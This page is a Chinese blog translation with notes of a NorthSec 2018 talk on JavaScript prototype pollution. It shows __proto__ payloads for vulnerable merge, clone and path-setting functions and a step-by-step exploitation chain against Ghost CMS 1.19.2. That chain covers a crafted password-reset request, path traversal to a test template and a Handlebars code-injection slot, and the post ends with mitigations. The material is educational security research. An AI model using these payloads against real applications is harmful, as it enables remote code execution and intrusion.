<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="JavaScript,Prototype-Pollution," />





  <link rel="alternate" href="/atom.xml" title="Cytosineの有被小窝~" type="application/atom+xml" />






<meta name="description" content="读完p牛的 深入理解 JavaScript Prototype 污染攻击 还有点意犹未尽，看了一下参考链接里第一个，觉得还有翻译的价值，于是乎在这里与大家一同学习啦~ 原文见：https://github.com/HoLyVieR/prototype-pollution-nsec18/  原型链污染攻击BY OLIVIER ARTEAU  我是谁？ 渗透测试人员&amp;amp;安全研究员 4年前我开始从">
<meta name="keywords" content="JavaScript,Prototype-Pollution">
<meta property="og:type" content="article">
<meta property="og:title" content="[翻译+笔记]nsec2018-JS原型链污染攻击">
<meta property="og:url" content="https://lovegood.github.io/2019/04/16/translation-js-prototype-pollution-attack-nsec2018/index.html">
<meta property="og:site_name" content="Cytosineの有被小窝~">
<meta property="og:description" content="读完p牛的 深入理解 JavaScript Prototype 污染攻击 还有点意犹未尽，看了一下参考链接里第一个，觉得还有翻译的价值，于是乎在这里与大家一同学习啦~ 原文见：https://github.com/HoLyVieR/prototype-pollution-nsec18/  原型链污染攻击BY OLIVIER ARTEAU  我是谁？ 渗透测试人员&amp;amp;安全研究员 4年前我开始从">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-04-16T05:19:12.959Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="[翻译+笔记]nsec2018-JS原型链污染攻击">
<meta name="twitter:description" content="读完p牛的 深入理解 JavaScript Prototype 污染攻击 还有点意犹未尽，看了一下参考链接里第一个，觉得还有翻译的价值，于是乎在这里与大家一同学习啦~ 原文见：https://github.com/HoLyVieR/prototype-pollution-nsec18/  原型链污染攻击BY OLIVIER ARTEAU  我是谁？ 渗透测试人员&amp;amp;安全研究员 4年前我开始从">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.3',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://lovegood.github.io/2019/04/16/translation-js-prototype-pollution-attack-nsec2018/"/>





  <title>[翻译+笔记]nsec2018-JS原型链污染攻击 | Cytosineの有被小窝~</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Cytosineの有被小窝~</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">悟已往之不谏，知来者之可追。</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
            cd ~
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
            uname -a
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
            ls -al post
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://lovegood.github.io/2019/04/16/translation-js-prototype-pollution-attack-nsec2018/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Cytosine">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.webp">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Cytosineの有被小窝~">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">[翻译+笔记]nsec2018-JS原型链污染攻击</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-04-16T08:49:06+08:00">
                2019-04-16
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>读完p牛的 <a href="https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html" target="_blank" rel="external">深入理解 JavaScript Prototype 污染攻击</a> 还有点意犹未尽，看了一下参考链接里第一个，觉得还有翻译的价值，于是乎在这里与大家一同学习啦~</p>
<p>原文见：<a href="https://github.com/HoLyVieR/prototype-pollution-nsec18/" target="_blank" rel="external">https://github.com/HoLyVieR/prototype-pollution-nsec18/</a></p>
<hr>
<h1 id="原型链污染攻击"><a href="#原型链污染攻击" class="headerlink" title="原型链污染攻击"></a>原型链污染攻击</h1><p>BY OLIVIER ARTEAU</p>
<hr>
<h1 id="我是谁？"><a href="#我是谁？" class="headerlink" title="我是谁？"></a>我是谁？</h1><ul>
<li>渗透测试人员&amp;安全研究员</li>
<li>4年前我开始从事信息安全的工作，在此之前，我从事web开发的工作</li>
</ul>
<hr>
<h1 id="计划（议程）"><a href="#计划（议程）" class="headerlink" title="计划（议程）"></a>计划（议程）</h1><ul>
<li>介绍JavaScript</li>
<li>什么允许了原型链污染？</li>
<li>怎样使它被利用？</li>
<li>缓解</li>
</ul>
<hr>
<h1 id="介绍JavaScript"><a href="#介绍JavaScript" class="headerlink" title="介绍JavaScript"></a>介绍JavaScript</h1><h2 id="JavaScript中如何声明一个类"><a href="#JavaScript中如何声明一个类" class="headerlink" title="JavaScript中如何声明一个类"></a>JavaScript中如何声明一个类</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">function Dog() &#123;</div><div class="line"></div><div class="line">&#125;</div><div class="line"></div><div class="line">Dog.prototype.talk = function () &#123;</div><div class="line">	return 42;</div><div class="line">&#125;</div><div class="line"></div><div class="line">var myDog = new Dog();</div><div class="line">myDog.talk(); // return 42;</div></pre></td></tr></table></figure>
<hr>
<h2 id="对象的基本原型"><a href="#对象的基本原型" class="headerlink" title="对象的基本原型"></a>对象的基本原型</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">var myDog = new Dog();</div><div class="line"></div><div class="line">// 指向 Dog() 函数  （译者注：[1]）</div><div class="line">myDog.constructor;</div><div class="line"></div><div class="line">// 指向 Dog 类的定义 （译者注：[2])</div><div class="line">myDog.constructor.prototype;</div><div class="line"></div><div class="line">// 指向 Dog 类的定义 （译者注：[2])</div><div class="line">myDog.__proto__;</div></pre></td></tr></table></figure>
<p>[1]: 就是<code>function Dog(){ }</code>这一部分<br>[2]: 包括三个部分，1是<code>function Dog(){ }</code>，2是<code>Dog.prototype.talk = function(){return 42;}</code>，3是从<code>Object</code>原型链继承的部分(JS是一个基于原型的语言，每个对象都有一个原型，并从原型继承方法和属性，最顶层的对象的原型为null)。</p>
<hr>
<h2 id="原型访问"><a href="#原型访问" class="headerlink" title="原型访问"></a>原型访问</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">var myDog = new Dog();</div><div class="line">var name = &quot;__proto__&quot;;</div><div class="line"></div><div class="line">myDog[&quot;__proto__&quot;] === myDog.__proto__;</div><div class="line">myDog[name] === myDog.__proto__;</div><div class="line">myDog[&quot;toString&quot;] === myDog.toString;</div></pre></td></tr></table></figure>
<p>(JS中可以通过数组下标的方式实现对对象属性的访问。)</p>
<hr>
<h1 id="原型链污染？"><a href="#原型链污染？" class="headerlink" title="原型链污染？"></a>原型链污染？</h1><ul>
<li>“Object”和其他基本类型的扩展方法</li>
<li>如”prototype.js”等库</li>
<li><p>考虑下面这个糟糕的实现：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">Object.prototype.containsTheAnswer = function () &#123;</div><div class="line">  return this.hasOwnProperty(&quot;42&quot;);</div><div class="line">&#125;</div><div class="line"></div><div class="line">var a = &#123;&quot;42&quot;:true&#125;;</div><div class="line"></div><div class="line">a.containsTheAnswer(); // true</div></pre></td></tr></table></figure>
</li>
</ul>
<hr>
<h1 id="原型链污染攻击-1"><a href="#原型链污染攻击-1" class="headerlink" title="原型链污染攻击"></a>原型链污染攻击</h1><h2 id="如果攻击者能够向对象的原型添加属性，那么会发生什么？"><a href="#如果攻击者能够向对象的原型添加属性，那么会发生什么？" class="headerlink" title="如果攻击者能够向对象的原型添加属性，那么会发生什么？"></a>如果攻击者能够向对象的原型添加属性，那么会发生什么？</h2><hr>
<h1 id="什么允许了原型链污染？"><a href="#什么允许了原型链污染？" class="headerlink" title="什么允许了原型链污染？"></a>什么允许了原型链污染？</h1><hr>
<h2 id="合并-merge-操作"><a href="#合并-merge-操作" class="headerlink" title="合并(merge)操作"></a>合并(merge)操作</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">var a = &#123; &quot;a&quot; : 1, &quot;b&quot; : 2 &#125;;</div><div class="line">var b = &#123; &quot;b&quot; : 3, &quot;d&quot; : 4 &#125;;</div><div class="line">var c = merge(a, b); // &#123; &quot;a&quot; : 1, &quot;b&quot; : 3, &quot;d&quot;: 4 &#125;;</div></pre></td></tr></table></figure>
<hr>
<p>（merge操作的一个简单实现：）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">function merge(a, b) &#123;</div><div class="line">    for (var attr in b) &#123;</div><div class="line">        if (isobject(a[attr]) &amp;&amp; isobject(b[attr])) &#123;</div><div class="line">            merge(a[attr], b[attr]);</div><div class="line">        &#125; else &#123;</div><div class="line">            a[attr] = b[attr];</div><div class="line">        &#125;</div><div class="line">    &#125;</div><div class="line"></div><div class="line">    return a;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<hr>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">var a = &#123; &quot;a&quot; : 1, &quot;b&quot; : 2 &#125;;</div><div class="line">var b = JSON.parse(&apos;&#123;&quot;__proto__&quot;:&#123;&quot;polluted&quot;:1&#125;&#125;&apos;);</div><div class="line">var c = merge(a, b);</div><div class="line">var d = &#123;&#125;;</div><div class="line">d.polluted // 1</div></pre></td></tr></table></figure>
<p>(</p>
<ul>
<li>在JS中，查找对象的属性，如果在当前对象的全部属性中未找到，会继续向上，在对象的原型中寻找该属性，如果在对象的原型中，还未找到该属性，会继续寻找该对象原型的原型，直到找到，或是原型的原型为null。</li>
<li>如果某一个对象的原型A，被改变了，那么将会影响到所有原型链中存在A的对象。</li>
<li><code>var d = {};</code>但是<code>d.polluted</code>值却为1，说明d对象的原型链中含有了<code>polluted</code>属性，也就是：通过merge()函数，成功地在b的原型（Object）的属性中增加了名为<code>polluted</code>的属性。</li>
<li>为什么<code>var b = JSON.parse(xxx)</code>？见<a href="https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html#0x04" target="_blank" rel="external">p牛文章</a></li>
</ul>
<p>)</p>
<hr>
<ul>
<li>包括非常流行的库都受该漏洞影响，如lodash何Hoek</li>
<li>详细信息见<a href="https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf" target="_blank" rel="external">paper</a>。</li>
</ul>
<hr>
<h2 id="克隆-clone-操作"><a href="#克隆-clone-操作" class="headerlink" title="克隆(clone)操作"></a>克隆(clone)操作</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">var a = &#123; &quot;a&quot; : 1, &quot;b&quot; : 2 &#125;;</div><div class="line">var b = clone(a);</div><div class="line">b.a // 1</div><div class="line">b.b // 2</div></pre></td></tr></table></figure>
<hr>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">function clone(a) &#123;</div><div class="line">	return merge(&#123;&#125;, a);</div><div class="line">&#125;</div><div class="line"></div><div class="line">var a = JSON.parse(&apos;&#123;&quot;__proto__&quot;:&#123;&quot;polluted&quot;:1&#125;&#125;&apos;);</div><div class="line">var b = clone(a);</div><div class="line">var d = &#123;&#125;;</div><div class="line">d.polluted // 1</div></pre></td></tr></table></figure>
<hr>
<ul>
<li>只有一个库被发现受此问题影响。</li>
<li>详细内容见paper</li>
</ul>
<hr>
<h2 id="路径分配操作"><a href="#路径分配操作" class="headerlink" title="路径分配操作"></a>路径分配操作</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">var obj = &#123; b: &#123;&quot;test&quot;:321&#125; &#125;;</div><div class="line">setValue(obj, &quot;b.test&quot;, 123);</div><div class="line">obj.b,test // 123</div></pre></td></tr></table></figure>
<hr>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">var obj = &#123;&#125;;</div><div class="line">setValue(obj, &quot;__proto__.polluted&quot;, 1);</div><div class="line">var d = &#123;&#125;;</div><div class="line">d.polluted // 1</div></pre></td></tr></table></figure>
<hr>
<ul>
<li>By design</li>
<li>详细见paper中。</li>
</ul>
<hr>
<h1 id="利用时间到了！"><a href="#利用时间到了！" class="headerlink" title="利用时间到了！"></a>利用时间到了！</h1><ul>
<li>该研究的案例是Ghost CMS v1.19.2</li>
<li>这是一个大应用</li>
<li>它使用了在用户输入下易受攻击的库。</li>
</ul>
<hr>
<h2 id="鉴别身份"><a href="#鉴别身份" class="headerlink" title="鉴别身份"></a>鉴别身份</h2><ul>
<li>第一步是找到受影响的库在哪里与用户输入一同被使用。</li>
<li><p>文件：/core/server/api/authentication.js</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">function doReset(options)&#123;</div><div class="line">    var data = options.data.passwordreset[0],</div><div class="line">      resetToken = data.token,</div><div class="line">      oldPassword = data.oldPassword,</div><div class="line">      newPassword = data.newPassword;</div><div class="line">    return settingsAPI.read(_.merge(&#123;key: &apos;db_hash&apos;&#125;, options))</div><div class="line">    [...]</div></pre></td></tr></table></figure>
</li>
</ul>
<hr>
<ul>
<li><p>思考这一点，我们可以构建出payload的大致框架：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">PUT /ghost/api/v0.1/authentication/passwordreset HTTP/1.1</div><div class="line">Host: localhost:2368</div><div class="line">Content-Type: application/json; charset=UTF-8</div><div class="line">Connection: close</div><div class="line"></div><div class="line">&#123;&quot;passwordreset&quot;: [&#123;</div><div class="line">    &quot;token&quot;: &quot;MHx0ZXN0QHRlc3QuY29tfHRlc3RzZXRlc3Q=&quot;,</div><div class="line">    &quot;email&quot;: &quot;test1321321@test.com&quot;,</div><div class="line">    &quot;newPassword&quot;: &quot;kdsflaksldk930209&quot;,</div><div class="line">    &quot;ne2Password&quot;: &quot;kdsflaksldk930209&quot;,</div><div class="line">    &quot;__proto__&quot;: &#123;</div><div class="line">    </div><div class="line">    &#125;</div><div class="line">&#125;]&#125;</div></pre></td></tr></table></figure>
</li>
</ul>
<hr>
<h2 id="不要崩溃！"><a href="#不要崩溃！" class="headerlink" title="不要崩溃！"></a>不要崩溃！</h2><ul>
<li><p>添加任何一个属性，几乎都会造成所有端点在执行完成之前崩溃。</p>
</li>
<li><p>第一个目标是确定哪个属性需要被添加，以便至少有一个端点能够到达有趣的那点(漏洞点)。</p>
</li>
<li><p>该漏洞利用的目标端点是主页面。</p>
</li>
<li><p>我们想要到达的漏洞点是渲染所有模板的地方。</p>
</li>
<li><p>第一策略：添加上造成”undefined”异常处的、缺少的值。</p>
</li>
<li><p>文件：/core/server/controllers/channel.js</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">// 调用 fetchData 来得到我们需要从该API中获得的一切信息</div><div class="line">return fetchData(res.locals.channel).then(</div><div class="line">    function handleResult(result) &#123;</div><div class="line">        // If page is greater than number of pages we [...]</div><div class="line">        // 如果 page 参数大于我们[...]页面的总数</div><div class="line">        if (pageParam &gt; result.meta.paination.page) &#123;</div><div class="line">            [...]</div><div class="line">        &#125;</div></pre></td></tr></table></figure>
</li>
</ul>
<ul>
<li><p>为了修复该点，我们将污染这个值：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&quot;meta&quot;: &#123;&quot;pagination&quot;: &#123;&quot;pages&quot;: &quot;100&quot;&#125;&#125;</div></pre></td></tr></table></figure>
</li>
<li><p>第二策略：避免”dead-end”</p>
</li>
<li><p>有时，应用程序会在注入额外无效值的地方崩溃。</p>
</li>
<li><p>确定属性，避免使用会到达”dead-end”的代码路径。</p>
</li>
<li><p>第三策略：修复递归问题</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">Object.prototype.foo = &#123;&#125;;</div><div class="line">(&#123;&#125;).foo.foo.foo.foo.foo === (&#123;&#125;).foo;</div></pre></td></tr></table></figure>
</li>
</ul>
<ul>
<li><p>修复完的版本：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">Object.prototype.foo = &#123;&quot;foo&quot;: &quot;&quot;&#125;;</div><div class="line">(&#123;&#125;).foo.foo === &quot;&quot;;</div></pre></td></tr></table></figure>
</li>
</ul>
<hr>
<h1 id="利用！"><a href="#利用！" class="headerlink" title="利用！"></a>利用！</h1><ul>
<li>使用属性注入。</li>
<li><p>渲染模板是懒加载的。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line">module.exports.setTemplate = </div><div class="line">    function setTemplate(req, res, data) &#123;</div><div class="line">        var routeConfig = res._route || &#123;&#125;;</div><div class="line">        if (res._template &amp;&amp; !req.err) &#123;</div><div class="line">            return;</div><div class="line">        &#125;</div><div class="line">        if (req.err) &#123;</div><div class="line">            res._template = _private.getTemplateForError(</div><div class="line">                res.statusCode;</div><div class="line">            );</div><div class="line">            return;</div><div class="line">        &#125;</div><div class="line">        [...]</div></pre></td></tr></table></figure>
</li>
<li><p>在最终选择<code>_template</code>之前，我将它指向了一个受我控制的本地文件。</p>
</li>
<li><p>我对这个文件做了一些fuzz，来确定哪些内容能够帮助我们注入任意代码。</p>
</li>
<li><p>有一部分的调用可能已经被破坏，无法执行我们选择的代码。</p>
</li>
<li><p>包含我们任意代码的属性是”blockParams”。</p>
</li>
<li><p>我们必须找到一个包含部分调用的模板。</p>
</li>
<li><p>包含部分调用的该应用的所有模板都会在渲染期间崩溃。</p>
</li>
<li><p>测试用例模板在”express-hbs”中提供。</p>
</li>
<li><p>最终目标：”../../../current/node_modules/express-hbs/test/issues/23/emptyComment.hbs”</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">&quot;_template&quot;: &quot;../../../current/node_modules/express-hbs/test/issues/23/emptyComment.hbs&quot;</div><div class="line">&quot;program&quot;: &#123;</div><div class="line">    &quot;opcodes&quot;: [&#123;</div><div class="line">        &quot;opcode&quot;: &quot;pushLiteral&quot;,</div><div class="line">        &quot;args&quot;: [&quot;1&quot;]</div><div class="line">    &#125;, &#123;</div><div class="line">        &quot;opcode&quot;: &quot;appendEscaped&quot;,</div><div class="line">        &quot;args&quot;: [&quot;1&quot;]</div><div class="line">    &#125;],</div><div class="line">    &quot;children&quot;: [],</div><div class="line">    &quot;blockParams&quot;: &quot;CODE GOES HERE&quot;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<hr>
<h1 id="缓解"><a href="#缓解" class="headerlink" title="缓解"></a>缓解</h1><ul>
<li>Object.freeze(Object.prototype)</li>
<li>使用像ajv这样的库来进行JSON格式的数据解析</li>
<li>使用 Map 代替 Object</li>
</ul>
<hr>
<h1 id="GitHub"><a href="#GitHub" class="headerlink" title="GitHub"></a>GitHub</h1><ul>
<li><a href="https://github.com/HoLyVieR/prototype-pollution-nsec18" target="_blank" rel="external">https://github.com/HoLyVieR/prototype-pollution-nsec18</a></li>
</ul>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>窝很可爱，请给窝钱</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>赞赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechat.png" alt="Cytosine 微信支付"/>
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.jpg" alt="Cytosine 支付宝"/>
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/JavaScript/" rel="tag"># JavaScript</a>
          
            <a href="/tags/Prototype-Pollution/" rel="tag"># Prototype-Pollution</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/04/13/tools-browser-extension-octotree/" rel="next" title="推荐插件，octotree，树形展示Github仓库代码">
                <i class="fa fa-chevron-left"></i> 推荐插件，octotree，树形展示Github仓库代码
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/04/16/translation-js-prototype-pollution-attack-in-nodejs/" rel="prev" title="translation-js-prototype-pollution-attack-in-nodejs">
                translation-js-prototype-pollution-attack-in-nodejs <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.webp"
                alt="Cytosine" />
            
              <p class="site-author-name" itemprop="name">Cytosine</p>
              <p class="site-description motion-element" itemprop="description">悟已往之不谏，知来者之可追。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">32</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">43</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          <div class="links-of-author motion-element">
            
              
                <span class="links-of-author-item">
                  <a href="https://github.com/Lovegood" target="_blank" title="GitHub">
                    GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://www.zhihu.com/people/CytosineLovegood/activities" target="_blank" title="知乎">
                    知乎</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://zhuanlan.zhihu.com/dashijian" target="_blank" title="安全大事件">
                    安全大事件</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://xuptsec.github.io/" target="_blank" title="XUPTSEC-blog">
                    XUPTSEC-blog</a>
                </span>
              
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                from dalao import
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://exp101t.blogspot.com/" title="Murasaki" target="_blank">Murasaki</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://pcat.cnblogs.com/" title="pcat" target="_blank">pcat</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://flygon.net/" title="飞龙" target="_blank">飞龙</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://ju5tw4nty0u.top/" title="ju5tw4nty0u" target="_blank">ju5tw4nty0u</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://webdog.ml/" title="grt1st" target="_blank">grt1st</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.k0rz3n.com/" title="K0rz3n" target="_blank">K0rz3n</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://skysec.top/" title="一叶飘零" target="_blank">一叶飘零</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.lovei.org/" title="腹黑" target="_blank">腹黑</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://sec2hack.com/" title="Wfox" target="_blank">Wfox</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
